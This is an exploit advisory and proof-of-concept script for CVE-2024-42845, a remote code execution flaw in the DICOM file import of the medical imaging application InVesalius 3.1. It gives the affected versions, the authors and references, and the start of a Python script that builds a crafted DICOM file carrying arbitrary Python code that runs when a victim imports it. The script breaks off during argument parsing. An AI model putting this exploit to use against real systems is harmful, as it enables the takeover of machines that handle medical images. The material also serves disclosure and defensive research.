# Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE)
# Discovered By: Alessio Romano (sfoffo), Riccardo Degli Esposti (partywave)
# Exploit Author: Alessio Romano (sfoffo), Riccardo Degli Esposti
#(partywave)
# Date: 23/08/2024
# Vendor Homepage: https://invesalius.github.io/
# Software Link:
#https://github.com/invesalius/invesalius3/tree/master/invesalius
# Version: 3.1.99991 to 3.1.99998
# Tested on: Windows
# CVE: CVE-2024-42845
# External References:
#https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845,
#https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845,
#https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan
# Description:
#----------------
#
#A Remote Code Execution (RCE) vulnerability exists in the DICOM file import
#procedure in Invesalius3. This vulnerability afflicts all versions from
#3.1.99991 to 3.1.99998. The exploitation steps of this vulnerability
#involve the use of a crafted DICOM file which, once imported inside the
#victim's client application allows an attacker to gain remote code
#execution over the victim's machine.
# Script:
#----------------
#
###
# The script below creates a specifically crafted DICOM payload for
#CVE-2024-42845. Remote Code Execution is gained once the DICOM file is
#imported inside the victim's client application.
###
import pydicom
import base64
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Read a DICOM file.')
parser.add_argument('--dicom', required=True, help='Path to the input DICOM file')
parser.add_argument('--outfile', required=True, help='Path to the output DICOM file')
parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code')
parser.add_argument('--signature', required=False, default=True)